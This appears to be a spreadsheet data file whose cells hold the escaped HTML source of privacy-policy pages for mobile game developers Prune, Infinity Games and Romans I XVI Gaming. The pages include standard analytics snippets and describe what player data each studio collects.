    &lt;meta name="twitter:image" content="http://www.prunegame.com/img/thumbnail_twitter.jpg"&gt;_x005F_x000D_
    &lt;meta name="twitter:app:country" content="US"&gt;_x005F_x000D_
     &lt; meta name="twitter:app:name:iphone" content="Prune"&gt;_x005F_x000D_
    </t>
  </si>
  <si>
    <t>&lt;meta name="twitter:app:id:iphone" content="972319818"&gt;_x005F_x000D_
    &lt;meta name="twitter:app:name:ipad" content="Prune"&gt;_x005F_x000D_
     &lt;meta name="twitter:app:id:ipad" content="972319818"&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!--[if lt IE 7.]&gt;_x005F_x000D_
        &lt;script defer type="text/javascript" src="bin/pngfix.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
&lt;body&gt;_x005F_x000D_
    &lt;div id="background"&gt;_x005F_x000D_
        &lt;div id="red"&gt;&lt;/div&gt;_x005F_x000D_
        &lt;div id="tree"&gt;&lt;/div&gt;_x005F_x000D_
        &lt;div id="ground"&gt;&lt;/div&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
    &lt;div id="title"&gt;_x005F_x000D_
        &lt;h1&gt;prune&lt;/h1&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
    &lt;div id="content"&gt;_x005F_x000D_
  _x005F_x000D_
        &lt;div id="support"&gt;_x005F_x000D_
            &lt;h1&gt;Privacy Policy&lt;/h1&gt;_x005F_x000D_
		 Prune uses the game engine, Unity. See their privacy policy here: &lt;a href="https://unity3d.com/legal/privacy-policy"&gt;Unity Privacy Policy&lt;/a&gt;_x005F_x000D_
		&lt;br/&gt;&lt;br/&gt;_x005F_x000D_
		As of version 1.1.3 Prune does not collect any data whatsoever.</t>
  </si>
  <si>
    <t>Prior to that version Prune collected basic data like device type and play time for crash and analytics purposes._x005F_x000D_
            _x005F_x000D_
		&lt;br/&gt;&lt;br/&gt;If you have any questions about the privacy policy please contact &lt;a href="mailto:support@prunegame.com"&gt;support@prunegame.com&lt;/a&gt;._x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
    &lt;div id="links"&gt;_x005F_x000D_
        &lt;div class="link"&gt;&lt;a href="mailto:hello@prunegame.com"&gt;say hello!&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
        &lt;div class="link"&gt;&lt;a href="press/sheet.php?p=prune"&gt;press?&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
        &lt;div class="link"&gt;&lt;a href="http://twitter.com/prunegame"&gt;@prunegame&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
       &lt;div class="link"&gt;&lt;a href="support.html"&gt;support&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
	_x005F_x000D_
_x005F_x000D_
    &lt;div id="footer"&gt;    _x005F_x000D_
        &lt;a href="http://www.polyculture.co" title="Polyculture"&gt;&lt;img style="margin: 10px;"  width="125" height="125" src="img/polyculture_icon_big.png" onmouseover="this.src='img/polyculture_icon_big_highlight.png'" onmouseout="this.src='img/polyculture_icon_big.png'" /&gt;&lt;/a&gt;_x005F_x000D_
        &lt;p id="gameby"&gt;a game by joel mcdonald _x005F_x000D_
            &lt; a href="http://twitter.com/mcdjoel"&gt;&lt;img style="margin-left: 5px;" width="20" height="20" src="img/twitter.png" onmouseover="this.src='img/twitter_blue.png'" onmouseout="this.src='img/twitter.png'" /&gt;&lt;/a&gt;_x005F_x000D_
        &lt;/p&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
    &lt;script&gt;_x005F_x000D_
    (function (i, s, o, g, r, a, m) {_x005F_x000D_
        i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () {_x005F_x000D_
            (i[r].q = i[r].q || []).push(arguments)_x005F_x000D_
        }, i[r].l = 1 *</t>
  </si>
  <si>
    <t>new Date(); a = s.createElement(o),_x005F_x000D_
        m = s.getElementsByTagName(o)[0]; a.async = 1; a.src = g; m.parentNode.insertBefore(a, m)_x005F_x000D_
    })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');_x005F_x000D_
_x005F_x000D_
    ga('create', 'UA-59722782-1', 'auto');_x005F_x000D_
    ga('send', 'pageview');_x005F_x000D_
    &lt;/script&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- Start of StatCounter Code for Default Guide --&gt;_x005F_x000D_
    &lt;script type="text/javascript"&gt;_x005F_x000D_
        var sc_project = 10295714;_x005F_x000D_
        var sc_invisible = 1;_x005F_x000D_
        var sc_security = "b9534076";_x005F_x000D_
        var scJsHost</t>
  </si>
  <si>
    <t>: "http://www.");_x005F_x000D_
        document.write("&lt;sc" + "ript type='text/javascript' src='" +_x005F_x000D_
        scJsHost +_x005F_x000D_
        "statcounter.com/counter/counter.js'&gt;&lt;/" + "script&gt;");_x005F_x000D_
    &lt;/script&gt;_x005F_x000D_
    &lt;noscript&gt;_x005F_x000D_
        &lt;div class="statcounter"&gt;_x005F_x000D_
            &lt;a title="web stats"_x005F_x000D_
               href="http://statcounter.com/" target="_blank"&gt;_x005F_x000D_
                &lt;img class="statcounter"_x005F_x000D_
                     src="http://c.statcounter.com/10295714/0/b9534076/1/"_x005F_x000D_
                     alt="web stats"&gt;_x005F_x000D_
            &lt;/a&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
    &lt;/noscript&gt;_x005F_x000D_
    &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">End of StatCounter Code for Default Guide --&gt;_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US" &gt;
&lt;head&gt;
&lt;meta charset="UTF-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
&lt;!-- WP_HEAD() START --&gt;
&lt;title&gt;Privacy Policy - Infinity Games&lt;/title&gt;
&lt;link rel="preload" as="style" href="https://fonts.googleapis.com/ css?family=Muli:600,700,regular,|Muli:600,700,regular,|Muli:100,200,300,400,500,600,700,800,900" &gt;_x005F_x000D_
&lt;link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Muli:600,700,regular,|Muli:600,700,regular,|Muli:100,200,300,400,500,600,700,800,900"&gt;_x005F_x000D_
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Infinity Games &amp;raquo; Privacy Policy Comments Feed" href="https://infinitygames.io/privacy-policy/feed/" /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css' href='https://infinitygames.io/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://infinitygames.io/wp-includes/css/classic-themes.min.css?ver=1'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 2em;}body .is-layout-flow &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow &gt; .aligncenter{margin-left: auto !important;margin-right: auto ! important;}body .is-layout-constrained &gt; .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained &gt; .aligncenter{margin-left: auto !important;margin-right: auto !</t>
  </si>
  <si>
    <t>important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='contact-form-7-css' href='https://infinitygames.io/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.5.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='cf7md_roboto-css' href='//fonts.googleapis.com/css?family=Roboto:400,500' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='cf7-material-design-css' href='https://infinitygames.io/wp-content/plugins/material-design-for-contact-form-7/public/../assets/css/cf7-material-design.css?ver=2.6.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='oxygen-css' href='https://infinitygames.io/wp-content/plugins/oxygen/component-framework/oxygen.css?ver=4.5' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='https://infinitygames.io/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://infinitygames.io/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://infinitygames.io/wp-json/wp/v2/pages/3" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://infinitygames.io/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://infinitygames.io/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.1.1" /&gt;
&lt;link rel="canonical" href="https://infinitygames.io/privacy-policy/" /&gt;
&lt;link rel='shortlink' href='https://infinitygames.io/?p=3' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://infinitygames.io/wp-json/oembed/1.0/embed?url=https%3A%2F%2Finfinitygames.io%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://infinitygames.io/wp-json/oembed/1.0/embed?url=https%3A%2F%2Finfinitygames.io%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;link rel="apple-touch-icon" sizes="180x180" href="/wp-content/uploads/fbrfg/apple-touch-icon.png"&gt;
&lt;link rel="icon" type="image/png" sizes="32x32" href="/wp-content/uploads/fbrfg/favicon-32x32.png"&gt;
&lt;link rel="icon" type="image/png" sizes="16x16" href="/wp-content/uploads/fbrfg/favicon-16x16.png"&gt;
&lt;link rel="manifest" href="/wp-content/uploads/fbrfg/site.webmanifest"&gt;
&lt;link rel="mask-icon" href="/wp-content/uploads/fbrfg/safari-pinned-tab.svg" color="#5bbad5"&gt;
&lt;link rel="shortcut icon" href="/wp-content/uploads/fbrfg/favicon.ico"&gt;
&lt;meta name="msapplication-TileColor" content="#34454e"&gt;
&lt;meta name="msapplication-config" content="/wp-content/uploads/fbrfg/browserconfig.xml"&gt;
&lt;meta name="theme-color" content="#ffffff"&gt;&lt;link rel='stylesheet' id='oxygen-cache-21-css' href='//infinitygames.io/wp-content/uploads/oxygen/css/21.css?cache=1672245411&amp;#038;ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='oxygen-cache-80-css' href='//infinitygames.io/wp-content/uploads/oxygen/css/80.css?cache=1655134666&amp;#038;ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='oxygen-universal-styles-css' href='//infinitygames.io/wp-content/uploads/oxygen/css/universal.css?cache=1676991213&amp;#038;ver=6.1.1' type='text/css' media='all' /&gt;
&lt;!--</t>
  </si>
  <si>
    <t>END OF WP_HEAD() --&gt;
&lt;/head&gt;
&lt;body class="privacy-policy page-template-default page page-id-3  oxy-overlay-header wp-embed-responsive oxygen-body" &gt;
&lt;svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" &gt;&lt;defs&gt;&lt;filter id="wp-duotone-dark-grayscale"&gt;&lt;feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299</t>
  </si>
  <si>
    <t>type="table" tableValues="1 1" /&gt;&lt;/feComponentTransfer&gt;&lt;feComposite in2="SourceGraphic" operator="in" /&gt;&lt;/filter&gt;&lt;/defs&gt;&lt;/svg&gt;
						&lt;header id="_header-1-21" class="oxy-header-wrapper oxy-sticky-header oxy-overlay-header oxy-header" &gt;&lt;div id="header" class="oxy-header-row" &gt;&lt;div class="oxy-header-container"&gt;&lt;div id="_header_left-3-21" class="oxy-header-left" &gt;&lt;a id="link-50-21" class="ct-link" href="https://infinitygames.io/" target="_self"  &gt;&lt;img  id="image-6-21" alt="" src="https://infinitygames.io/wp-content/uploads/2019/11/infinitygames-logoh.svg" class="ct-image"/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div id="_header_center-4-21" class="oxy-header-center" &gt;&lt;/div&gt;&lt;div id="_header_right-5-21" class="oxy-header-right" &gt;&lt;nav id="_nav_menu-7-21" class="oxy-nav-menu oxy-nav-menu-dropdowns oxy-nav-menu-dropdown-arrow" &gt;&lt;div class='oxy-menu-toggle'&gt;&lt;div class='oxy-nav-menu-hamburger-wrap'&gt;&lt;div class='oxy-nav-menu-hamburger'&gt;&lt;div class='oxy-nav-menu-hamburger-line'&gt;&lt;/div&gt;&lt;div class='oxy-nav-menu-hamburger-line'&gt;&lt;/div&gt;&lt;div class='oxy-nav-menu-hamburger-line'&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="menu-main-menu-container"&gt;&lt;ul id="menu-main-menu" class="oxy-nav-menu-list"&gt;&lt;li id="menu-item-37" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-37"&gt;&lt;a href="#top"&gt;Home&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-38" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-38"&gt;&lt;a href="#games"&gt;Games&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-39" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-39"&gt;&lt;a href="#publish"&gt;Publish With Us&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-40" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-40"&gt;&lt;a href="#careers"&gt;Careers&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;/nav&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/header&gt;
				&lt;script type="text/javascript"&gt;
			jQuery(document).ready(function() {
				var selector = "#_header-1-21",
					scrollval = parseInt("300");
				if (!scrollval || scrollval &lt; 1) {
										if (jQuery(window).width() &gt;= 1141){
											jQuery("body").css("margin-top", jQuery(selector).outerHeight());
						jQuery(selector).addClass("oxy-sticky-header-active");
										}
									}
				else {
					var scrollTopOld = 0;
					jQuery(window).scroll(function() {
						if (!jQuery('body').hasClass('oxy-nav-menu-prevent-overflow')) {
							if (jQuery(this).scrollTop() &gt; scrollval 
																) {
								if (
																		jQuery(window).width() &gt;= 1141 &amp;&amp; 
																		! jQuery(selector).hasClass("oxy-sticky-header-active"))</t>
  </si>
  <si>
    <t xml:space="preserve">{
									if (jQuery(selector).css('position')!='absolute') {
										jQuery("body").css("margin-top", jQuery(selector).outerHeight());
									}
									jQuery(selector)
										 .addClass("oxy-sticky-header-active")
																			 .addClass("oxy-sticky-header-fade-in");
																	}
							}
							else {
								jQuery(selector)
									.removeClass("oxy-sticky-header-fade-in")
									</t>
  </si>
  <si>
    <t>.removeClass("oxy-sticky-header-active");
								if (jQuery(selector).css('position')!='absolute') {
									jQuery("body").css("margin-top", "");
								}
							}
							scrollTopOld = jQuery(this).scrollTop();
						}
					})
				}
			});
		&lt;/script&gt;&lt;section id="section-2-80" class=" ct-section" &gt;&lt;div class="ct-section-inner-wrap"&gt;&lt;div id="div_block-7-80" class="ct-div-block" &gt;&lt;h1 id="headline-8-80" class="ct-headline"&gt;&lt;span id="span-20-80" class="ct-span" &gt;Privacy Policy&lt;/span&gt;&lt;/h1&gt;&lt;div id="div_block-9-80" class="ct-div-block" &gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/section&gt;&lt;section id="section-12-80" class=" ct-section" &gt;&lt;div class="ct-section-inner-wrap"&gt;&lt;div id="div_block-13-80" class="ct-div-block" &gt;&lt;div id='inner_content-18-80' class='ct-inner-content'&gt;&lt;section id="section-2-43" class=" ct-section" &gt;&lt;div class="ct-section-inner-wrap"&gt;&lt;div id='inner_content-7-43' class='ct-inner-content'&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Last Updated: 19/12/2022&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;Infinity Games Lda.&lt;/h3&gt;
&lt;p&gt; We are &lt;strong&gt;Infinity Games&lt;/strong&gt;, a mobile game developer and publisher under the legal name of Infinity Games Lda.&lt;/p&gt;
&lt;p&gt; The purpose of this policy is to provide you with all the important details and explanations of how and why some of your data may be collected and processed by Infinity Games Lda and how you can exercise your privacy rights.</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;p&gt;Infinity Games Lda is a company under the laws of Portugal (“Infinity Games” or “we”), a developer and publisher of games and mobile game applications that are made available via app stores including the Apple App Store and Google Play Store. This Privacy Policy applies to personal information that we collect through our games, mobile applications and other products (“Games”), advertising that are tailored to the interest of users ("Ads") and websites we control, including &lt;strong&gt;https://www.infinitygames.io/&lt;/strong&gt; (“Website”) (together “Services”). &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;INFORMATION</t>
  </si>
  <si>
    <t>WE COLLECT FROM YOU&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Most of the information that we collect about you comes directly from you when you play our Games or interact with third-party ads in our Games or with our ads in other publisher’s Games. In general, the information we collect about you relates to the type of device you are using, information that helps us identify your device, how you play our Games and may include information that you submit to us when you voluntarily contact us. We may also collect information from app store platforms and partners and other third parties such as information about your interests and in-app purchases (provided that we never receive your payment or credit card information).&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>The information that we may collect about you through the Services broadly falls into the following categories:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;(a) Information that you provide voluntarily&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Certain parts of our Services may ask you to provide personal information voluntarily. For example, we will ask for certain information in order for you to submit enquiries to us, such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;your name, email address or other details, necessary to process your inquiries;&lt;/li&gt;
&lt;li&gt;any information you submit to our support team via email.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>The personal information that you are asked to provide and the reasons why you are asked to provide it, we will try to explain to you at the point we ask you to provide your personal information.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;(b) Information that we collect automatically&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;When you use our Services, we may also collect certain information automatically from you and/or your device which may be considered personal information under applicable data protection laws, such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Data and analytics about your use of our Services (e.g. in-game play progress, levels, games played, session length, preferred settings, which in-game adverts you may have viewed, in-game references or just game preferences, the means by which you were referred to our Services)&lt;/li&gt;
&lt;li&gt;Your IP address and device identifiers such as your Advertising ID, Device ID numbers (for more see here “Advertising IDs and Device IDs”)&lt;/li&gt;
&lt;li&gt;Your device type and the operating system that you use&lt;/li&gt;
&lt;li&gt;Your Service communications (e.g. in-game emotion signals which you exchange with other players)&lt;/li&gt;
&lt;li&gt;Broad geographic location (e.g. country or city-level location) based on your IP address&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;Advertising ID&lt;/em&gt;&amp;nbsp;means Apple Identifier for Advertisers (“IDFA”) on Apple and Google Advertising Identity (“GAID”). These are unique identifiers for mobile device that advertisers use for personalized advertising.</t>
  </si>
  <si>
    <t>They are consistent across all mobile applications and thus allow cross-app tracking. On Apple, you can opt out of it by choosing “limit ad tracking” option in your privacy settings. On Google Android, you can opt out of these ads by choosing “Opt-out of personalized ads”.</t>
  </si>
  <si>
    <t>Advertising IDs are non-permanent, non-personal identifiers, which are uniquely associated with your device.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Device identifier / information&lt;/em&gt;&amp;nbsp;means device type, device model, device maker, device operating system and its language or other technical data like screen size or processor, or combination of this data available from a device for a developer for checking the device compatibility with a particular application.&lt;/p&gt;
&lt;p&gt;Some of this information may be collected through cookies as explained further under the heading&amp;nbsp;&lt;strong&gt;Cookies&amp;nbsp;&lt;/strong&gt;below.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;(c) &amp;nbsp;Information we obtain from third-party sources&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Third-Party Social Network/s.&lt;/strong&gt;&amp;nbsp;Google Play Games Service, Apple Game Center, Facebook&amp;nbsp;&lt;strong&gt;(“Third-Party Social Network/s”).&lt;/strong&gt;&amp;nbsp;You may choose to connect to our Services via your social media account. Exactly what information we receive from your social media will depend on your social media privacy settings, but it would typically include your basic public profile information such as your username, gender, your friends playing the same Game. (See below also “Third-Party Networks”).&lt;/li&gt;
&lt;li&gt;Third party service providers.</t>
  </si>
  <si>
    <t>We may receive personal information about you from third-party sources. We may get your personal information for example when you installed our Game and prior to installing you have clicked an advertisement for the same Game.&lt;/li&gt;
&lt;li&gt;Advertising partners. From time to time, we may also receive personal information about you from other third-party sources.</t>
  </si>
  <si>
    <t>For example, if you clicked on an advertisement to direct you to one of our Services (such as an advert of one of our Games in other publisher’s game), we will be provided with information from which ad network and advertising campaign the install originated from (See below also “Advertising”).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;(d) No special categories of information&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We do not request or intend to collect any “special categories of information” such as any information on health, race, religion, political opinions or philosophical beliefs, sexual preferences or orientation. Kindly be cautious when sharing this information about yourself (or others) in our forums.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;HOW WE USE YOUR INFORMATION&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;2.1.</t>
  </si>
  <si>
    <t>In General&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We use the information we collect about you/your device to deliver services and our Games to you and to operate our business. We use it also for improving our services and Games, for enhancing security and for analytics and research purposes to make sure we provide you with the best experience. In addition, we use your information to promote our services and Games in our Games and also in other publisher’s apps and to display third-party advertisements to you.</t>
  </si>
  <si>
    <t>We use your information also for tracking and fraud prevention for advertising purposes and for complying with our legal obligations.&lt;/p&gt;
&lt;p&gt; We use your information for the following&lt;strong&gt;&amp;nbsp;purposes&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt; Delivering and improving our services.&amp;nbsp;&lt;/strong&gt;We use your information for developing, delivering and improving our Games and other products, services, and content, tailoring our products and services, providing Game updates, technical troubleshooting, understanding and analyzing trends in connection with usage of the Games, and administering the Games.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Displaying advertisements&lt;/strong&gt;.</t>
  </si>
  <si>
    <t>We use your information for showing advertisements for our Games in other publisher’s apps and for displaying third-party advertisements in our Games. Please see more in Advertising Section of this Privacy Policy.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cross-promotion.&lt;/strong&gt;We use your information for cross-promoting our Games and services, meaning to promote one of our Games while you are playing a different Game of ours.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Tracking and fraud prevention for advertising purposes.&lt;/strong&gt;We use your information for tracking how our advertising campaigns perform and for identifying and preventing fraud for our advertising campaigns.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Analytics and research.&amp;nbsp;&lt;/strong&gt; We use your information for understanding and analysing trends in connection with the usage of the Games, gathering demographic information about our user base, data about where the Game was downloaded from.</t>
  </si>
  <si>
    <t>We may also create reports and analysis for the purposes of research or business intelligence, for example to track potential problems or trends with our Games and services, or to test our new game features and content.&lt;/li&gt;
&lt;li&gt;We use your information for enhancing the safety and security of our Games, products and services.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt; Customer Support.&lt;/strong&gt; We use your information for providing customer support to you and to respond to your inquiries.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Our legal obligations.&amp;nbsp;&lt;/strong&gt; We use your information when we are required to do so by law, for example, we use your country or region</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;&lt;html lang="en-US"&gt;&lt;head&gt;&lt;meta charset="UTF-8"&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;&lt;link rel="profile" href="https://gmpg.org/xfn/11"&gt;&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt; &lt;!-- This site is optimized with the Yoast SEO plugin v20.5 - https://yoast.com/wordpress/plugins/seo/ --&gt;&lt;title&gt;Privacy Policy - Romans I XVI Gaming&lt;/title&gt;&lt;link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin/&gt;&lt;link rel="preconnect" href="https://fonts.googleapis.com"/&gt;&lt;style type="text/css"&gt;@font-face {
 font-family: 'Kodchasan';
 font-style: normal;
 font-weight: 400;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/kodchasan/v6/1cXxaUPOAJv9sG4I-DJWiHGA.ttf) format('truetype');
}
@font-face {
 font-family: 'Kodchasan';
 font-style: normal;
 font-weight: 700;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/kodchasan/v6/1cX0aUPOAJv9sG4I-DJeM1SQhuCs.ttf) format('truetype');
}
@font-face {
 font-family: 'Mina';
 font-style: normal;
 font-weight: 400;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/mina/v6/-nFzOGc18vARnzhp6g.ttf) format('truetype');
}
@font-face {
 font-family: 'Mina';
 font-style: normal;
 font-weight: 700;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/mina/v6/-nF8OGc18vARl4NM-iLT8w.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto';
 font-style: italic;
 font-weight: 100;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/roboto/v29/KFOiCnqEu92Fr1Mu51QrEzAdKg.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto';
 font-style: italic;
 font-weight: 300;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/roboto/v29/KFOjCnqEu92Fr1Mu51TjASc6CsE.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto';
 font-style: italic;
 font-weight: 400;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/roboto/v29/KFOkCnqEu92Fr1Mu51xIIzc.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto';
 font-style: italic;
 font-weight: 500;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/roboto/v29/KFOjCnqEu92Fr1Mu51S7ACc6CsE.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto';
 font-style: italic;
 font-weight: 700;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/roboto/v29/KFOjCnqEu92Fr1Mu51TzBic6CsE.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto';
 font-style: italic;
 font-weight: 900;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/roboto/v29/KFOjCnqEu92Fr1Mu51TLBCc6CsE.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto';
 font-style: normal;
 font-weight: 100;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/roboto/v29/KFOkCnqEu92Fr1MmgVxIIzc.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto';
 font-style: normal;
 font-weight: 300;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/roboto/v29/KFOlCnqEu92Fr1MmSU5fBBc9.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto';
 font-style: normal;
 font-weight: 400;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/roboto/v29/KFOmCnqEu92Fr1Mu4mxP.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto';
 font-style: normal;
 font-weight: 500;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/roboto/v29/KFOlCnqEu92Fr1MmEU9fBBc9.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto';
 font-style: normal;
 font-weight: 700;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/roboto/v29/KFOlCnqEu92Fr1MmWUlfBBc9.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto';
 font-style: normal;
 font-weight: 900;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/roboto/v29/KFOlCnqEu92Fr1MmYUtfBBc9.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto Slab';
 font-style: normal;
 font-weight: 100;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/robotoslab/v16/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjojIWmb2Rm.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto Slab';
 font-style: normal;
 font-weight: 200;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/robotoslab/v16/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoDISmb2Rm.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto Slab';
 font-style: normal;
 font-weight: 300;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/robotoslab/v16/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjo0oSmb2Rm.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto Slab';
 font-style: normal;
 font-weight: 400;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/robotoslab/v16/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjojISmb2Rm.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto Slab';
 font-style: normal;
 font-weight: 500;
 font-display: swap;
